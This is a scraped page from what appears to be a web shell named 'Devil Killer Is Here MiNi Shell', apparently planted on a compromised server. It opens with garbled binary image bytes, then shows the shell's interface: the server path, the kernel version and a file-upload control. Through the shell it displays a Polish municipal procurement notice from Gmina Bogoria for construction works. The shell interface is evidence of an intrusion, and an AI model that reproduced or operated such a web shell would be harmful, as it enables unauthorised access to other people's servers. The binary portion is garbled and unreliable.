JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20230131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20230131/0007290501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> WYKORZYSTANIE OZE W NOWOPOWSTAŁYCH LUB MODERNIZOWANYCH BUDYNKACH PEŁNIĄCYCH FUNKCJE KULTURALNO-TURYSTYCZNE WRAZ Z WYPOSAŻENIEM W MAŁĄ INFRASTRUKTURĘ </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Bogoria</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 830409637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Opatowska 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bogoria</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-210</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">15 8674086 wew. 34</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">15 8674281</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@bogoria.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bogoria.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WYKORZYSTANIE OZE W NOWOPOWSTAŁYCH LUB MODERNIZOWANYCH BUDYNKACH PEŁNIĄCYCH FUNKCJE KULTURALNO-TURYSTYCZNE WRAZ Z WYPOSAŻENIEM W MAŁĄ INFRASTRUKTURĘ </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e3bb1bce-a14c-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00072905</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00053215/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Wykorzystanie OZE w nowopowstałych lub modernizaowanych budynkach pełniących funkcje kulturalno - turystyczne wraz z wyposażeniem w małą infrastrukturę</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bogoria.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://bogoria.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji:<br/>1) za pośrednictwem Platformy znajdującej się pod adresem: https://bogoria.ezamawiajacy.pl w zakładce „Korespondencja”.<br/>2. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przekazywanym na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres e-mail Zamawiającego. W przypadku skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie.<br/>3. Ogólne zasady korzystania z Platformy, z zastrzeżeniem pkt 4;<br/>1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Nazwa Jednostki https://bogoria.ezamawiajacy.pl lub https://oneplace.marketplanet.pl.<br/>2) Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>3) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w formie elektronicznej lub postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury<br/>założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki„Korespondencja”.<br/>4. Zamawiający, zgodnie z § 3 ust. 3 ww. Rozporządzenia określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) Włączona obsługa JavaScript;<br/>5) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.8. Zamawiający zgodnie z § 3 ust. 3 ww. Rozporządzenia, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods,odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv,<br/>zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLen</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: Urząd Gminy Bogoria reprezentowany przez Wójta Gminy Bogoria ul. Opatowska 13, 28-210 Bogoria, adres e-mail:urzad@bogoria.pl<br/>- kontakt do inspektora ochrony danych osobowych w Gminie Bogoria: inspektor@cbi24.pl.<br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego<br/>- odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późn. zm.);<br/>- Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia lub na okres przechowywania tych danych zgodnie z wytycznymi o dofinansowania z środków UE;<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>- posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.2.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ I – Formuła zaprojektuj i wybuduj <br/><br/>Przedmiotem zamówienia jest wykonanie dokumentacji technicznej i wybudowanie obiektów w formule ,,zaprojektuj-wbuduj” na podstawie programów funkcjonalno – użytkowych oraz uzyskanie stosownych decyzji administracyjnych zezwalających na rozpoczęcie robot. <br/>Wykonawca na etapie sporządzania projektu będzie uzgadniał wszelkie szczegóły opracowania z Zamawiającym. <br/>Zakres całej inwestycji należy zaprojektować i wykonać uwzględniając istniejące uwarunkowania gruntowe, oddziaływanie sąsiadujących sieci instalacyjnych, wielkość przeznaczonego pod inwestycje terenu oraz wszelkie założenia do PFU dla zadań pn.: <br/>•	„DOSTAWA I MONTAŻ URZĄDZEŃ ZABAWOWYCH NA TERENIE GMINY BOGORIA”<br/>•	„BUDOWA ALTAN REKREACYJNYCH ZE STANOWISKIEM DO GRILLOWANIA W FORMULE ZAPROJEKTUJ I WYBUDUJ NA TERENIE GMINY BOGORIA”<br/>•	„BUDOWA TĘŻNI SOLANKOWEJ WRAZ Z WYMIANĄ POSZYCIA DESKOWEGO POMOSTÓW NAD ZALEWEM BUCZYNA”<br/>•	BUDOWA OBIEKTU WIELOFUNKCYJNEGO KORTU TENISOWEGO, BOISKA DO PIŁKI SIATKOWEJ<br/>•	„BUDOWA BUDYNKÓW ŚWIETLIC WIEJSKICH”<br/><br/><br/>1.	„DOSTAWA I MONTAŻ URZĄDZEŃ ZABAWOWYCH NA TERENIE GMINY BOGORIA”<br/>•	NIEDŹWIEDŹ DZ. nr ewid 265/1, demontaż istniejącego placu zabaw ,montaż oświetlenia, budowa placu zabaw wraz z ogrodzeniem <br/>•	SZCZEGLICE dz. nr ewid 294, demontaż istniejącego placu zabaw, plac zabaw, oświetlenie<br/>•	WIERZBKA dz. nr ewid 599, wyrównanie i niwelacja terenu/ zasypanie stawu, plac zabaw ogrodzenie działki , oświetlenie<br/>•	PĘCŁAWICE GÓRNE dz. nr ewid 190, rozbiórka istniejącego ogrodzenia, budowa nowego ogrodzenia, instalacja nowych urządzeń, doświetlenie placu zabaw oświetlenie<br/>•	JÓZEFÓW WITOWICKI dz. nr ewid 839, droga dojazdowa, montaż placu zabaw, ogrodzenie i niwelacja terenu, oświetlenie <br/>•	KOLONIA WYSOKI MAŁE dz. nr ewid. 373, karczowanie i niwelacja terenu, montaż placu zabaw, ogrodzenie, oświetlenie<br/><br/>2.	„BUDOWA ALTAN REKREACYJNYCH ZE STANOWISKIEM DO GRILLOWANIA W FORMULE ZAPROJEKTUJ I WYBUDUJ NA TERENIE GMINY BOGORIA”<br/>Przedmiotem zamówienia jest zaprojektowanie i wybudowanie 5 altan biesiadnych wraz ze stanowiskiem do grillowania, elementami małej architektury utwardzeniem terenu oświetleniem OZE . Głównym zamierzeniem jest podniesienia atrakcyjności skweru miejskiego dla celów rekreacyjnych. Inwestycja będzie służyć wypoczynkowi mieszkańców poszczególnych miejscowości . Zadanie obejmuje wybudowanie 5 altan o powierzchni zabudowy do 35m2 każda w sąsiedztwie istniejącego placu zabaw lub na działkach niezabudowanych. Uzupełnieniem inwestycji jest wykonanie paleniska z rusztem do grillowania a także wykonanie dojścia – alejki utwardzonej kruszywem. Ponadto należy wyposażyć altany w stoły i ławy dla min. 12 osób. <br/>Teren inwestycji obejmuje części działek w miejscowościach: <br/>•	Ujazdek nr dz. 234, Budy nr dz. 84/4, <br/>•	Józefów Witowicki nr dz. 839, <br/>•	Witowice nr dz. 818, <br/>•	Kolonia Wysoki Małe nr dz. 373. <br/><br/>3. „BUDOWA TĘŻNI SOLANKOWEJ WRAZ Z WYMIANĄ POSZYCIA DESKOWEGO POMOSTÓW NAD ZALEWEM BUCZYNA”<br/>Przedmiotem zamówienia jest zaprojektowanie i wykonanie tężni solankowej wraz z wymianą poszycia deskowego pomostów nad zalewem Buczyna (działka nr 429).<br/>W ramach realizacji projektu planuje się: <br/>-	budowę tężni solankowej <br/>-	realizację ciągów pieszych w tym dojazd do tężni <br/>-	wykonanie nasadzenia roślin, <br/>-	montaż oświetlenia tężni <br/>-	montaż monitoringu <br/>-	budowę niezbędnej infrastruktury technicznej <br/>-	wymiana odeskowania pomostów<br/>Przed złożeniem oferty Wykonawca ma obowiązek odbyć wizje terenu opracowania oraz jego otoczenia w celu oceny na własną odpowiedzialność, kosztów i ryzyka, wszystkich czynników koniecznych do przygotowania rzetelnej oferty, obejmującej wszelkie niezbędne prace przygotowawcze, zasadnicze i towarzyszące zarówno do prowadzenia robót budowlano-montażowych, jak również przygotowania projektu. <br/><br/>4.	BUDOWA OBIEKTU WIELOFUNKCYJNEGO KORTU TENISOWEGO, BOISKA DO PIŁKI SIATKOWEJ<br/>Adres inwestycji: 28-210 Bogoria, ul. Leśna ( działka o nr ewid. 653/3) <br/>Budowa obiektu wielofunkcyjnego kortu tenisowego, boiska do piłki siatkowej” obejmuje wykonanie kompletnej dokumentacji projektowej zgodnie z opisem przedmiotu zamówienia wraz z wykonaniem robót budowlanych w pełnym zakresie, w tym uzyskanie niezbędnych decyzji, opinii i pozwoleń. Przedmiotem zamówienia jest również dostawa niezbędnego wyposażenia sportowego obiektu.<br/>Zamówienie obejmuje:<br/>W ramach niniejszego zadania oprócz prac projektowych należy uwzględnić:<br/>- roboty ziemne, prace związane z wykonaniem podbudowy pod obiekt;<br/>- zakup, dostawa i montaż nawierzchni wielofunkcyjnej multisportowej z modułów polipropylenowych wraz z liniami boisk;<br/>- umieszczenie w podbudowie wymaganych tulei dla wybranych dyscyplin sportowych;<br/>- dostawę oraz montaż niezbędnych urządzeń i sprzętu;<br/>- wszelkie inne związane z realizacją niniejszego zamówienia roboty budowlane.<br/><br/>5.	„BUDOWA BUDYNKÓW ŚWIETLIC WIEJSKICH”<br/>Przedmiotem zamówienia jest zaprojektowanie i budowę świetlic wiejskich w miejscowościach: Moszyny dz. nr ewid. 113/4, Malkowice dz. nr ewid. 99/1, Wola Kiełczyńska dz. nr ewid. 446W ramach zadania zostaną zaprojektowane i wybudowane budynki świetlic wiejskich wraz za zagospodarowaniem terenu .<br/>Przedmiot zamówienia obejmuje wykonanie kompletnej wielobranżowej dokumentacji projektowej, uzyskanie niezbędnych wymaganymi przepisami uzgodnień, pozwoleń, zgłoszeń, itp. oraz wykonanie całości robót budowlanych w oparciu o uprzednio opracowaną dokumentację zaakceptowaną przez Zamawiającego. <br/>	Zakres planowanych do realizacji robót budowlanych obejmuje:<br/>- Wykonanie badań geologicznych na podstawie, których wykonawca zaprojektuje sposób fundamentowania, grunty występujące na działce nie są gruntami rodzimymi. Wykonawca powinien przewidzieć wymianę gruntu.<br/>- Roboty ziemne – wykopy pod fundamenty, prace niwelacyjne.<br/>- Wykonanie ław fundamentowych wraz z ich izolacją.<br/>- Wykonanie ścian fundamentowych wraz z ich izolacją.<br/>- Montaż prefabrykowanych modułów kontenerowych<br/>- Wykonanie konstrukcji drewnianej dachowej.<br/>- Wykonanie pokrycia dachowego.<br/>- Wykonanie ścianek działowych.<br/>- Wykonanie instalacji elektrycznej.<br/>- Wykonanie wewnętrznej instalacji wodno-kanalizacyjnej<br/>- Montaż nowej stolarki okiennej i drzwiowej w obiekcie<br/>- Wykonanie nowych posadzek: Wykładzina PCV gr 3mm<br/>- Wykonanie izolacji termicznej: ściany fundamentowej (montaż bednarki, wykonanie izolacji przeciwwilgociowej pionowej), ścian zewnętrznych.<br/>- Wykonanie pokrycia dachowego nad całością, łącznie z montażem rynien, rur spustowych, wykonaniem obróbek, wykonaniem podbitki, montaż instalacji odgromowej<br/>- Prace wykończeniowe.<br/>- Wykonanie przyłącza elektrycznego.<br/>- Wykonanie przyłącza wodnego.<br/>- Wykonanie przyłącza kanalizacyjnego do istniejącej sieci kanalizacyjnej lub wykonanie zbiornika na nieczystości, w zależności od możliwości technicznych.<br/>- Wykonanie zagospodarowania terenu: utwardzenia, opaski wokół budynku, dojść i dojazdów do budynku, podjazdu dla niepełnosprawnych, schodów zewnętrznych, wyprofilowanie nowego zjazdu do działki, wyprofilowanie wjazdu na parking dla interesantów <br/>- Nawiezienie ziemi urodzajnej 0,30m gr. poza terenem utwardzonym w obrębie obiektu z obsianiem trawą.<br/><br/>Oferta dostarczona przez Oferentów winna obejmować komplet dostaw i usług koniecznych do przeprowadzenia całości przedsięwzięcia aż do przekazania Zamawiającemu. Oferent ujmie w swoim zakresie również te dodatkowe roboty i elementy, które nie zostały wyszczególnione w programie funkcjonalno-użytkowym, a są niezbędne do prawidłowego wykonania całości zadania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">1)	Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 PZP, w okresie 3 lat od dnia udzielenia zamówienia podstawowego. Zamówienia te polegać będą na powtórzeniu robót podobnych do robót stanowiących przedmiot niniejszego zamówienia.<br/>2)	Zamówienia, o których mowa w ust. 6 pkt 1 będą polegały na powtórzeniu robót zgodnych <br/>z zakresem robót stanowiącymi przedmiot niniejszego zamówienia. 